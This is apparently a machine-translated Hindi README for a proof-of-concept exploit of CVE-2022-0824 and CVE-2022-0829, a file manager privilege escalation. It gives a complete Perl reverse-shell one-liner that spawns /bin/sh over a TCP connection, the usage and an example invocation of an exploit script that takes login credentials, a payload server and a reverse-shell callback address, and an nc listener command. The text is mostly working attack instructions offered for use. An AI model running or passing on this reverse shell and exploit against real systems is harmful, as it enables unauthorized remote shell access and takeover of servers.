
CVE-2022-0824, CVE-2022-0829, File Manger विशेषाधिकार शोषण
CVE-2022-0824, CVE-2022-0829 - फ़ाइल प्रबंधक विशेषाधिकार शोषण
इस PoC का परीक्षण करने के लिए कमज़ोर एप्लिकेशन एक डॉकर इमेज के रूप में यहां पाया जा सकता है।
पूर्वापेक्षाएँ:
perl -e 'use Socket;$i="0.0.0.0";$p=1111;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
$ python3 cve-2022-0824.py --help
usage: cve-2022-0824.py [-h] --host HOST --user USER --password PASSWORD
--Python_server PYTHON_SERVER --callback_url
CALLBACK_URL [--proxy PROXY]
optional arguments:
-h, --help show this help message and exit
--host HOST Host url(complete)
--user USER Username
--password PASSWORD Password
--Python_server PYTHON_SERVER
Python httpServer with port
--callback_url CALLBACK_URL
Callback ip and port
--proxy PROXY Proxy details
$ python3 cve-2022-0824.py --host [Target_url] --user [Username] --password[Password] --Python_server [Filehosting Server Information] ----callback_url [<ip>:<port> for reverse shell connections] --proxy [Proxy server details - optional]
$ python3 cve-2022-0824.py --host http://localhost:10000 --user usr --password usr --Python_server 192.168.43.228:9999 --callback_url 192.168.43.228:1234 --proxy http://127.0.0.1:8080
उपयोगकर्ता नाम और पासवर्ड सुरक्षित उपयोगकर्ताओं (गैर-विशेषाधिकार प्राप्त) के लिए हैं। रिवर्स शेल कनेक्शन प्राप्त करने के लिए स्क्रिप्ट चलाने से पहल लिसनर सेट अप करें।
$ nc -lvp <port>
इस शोषण के लिए @faisalfs10x का धन्यवाद।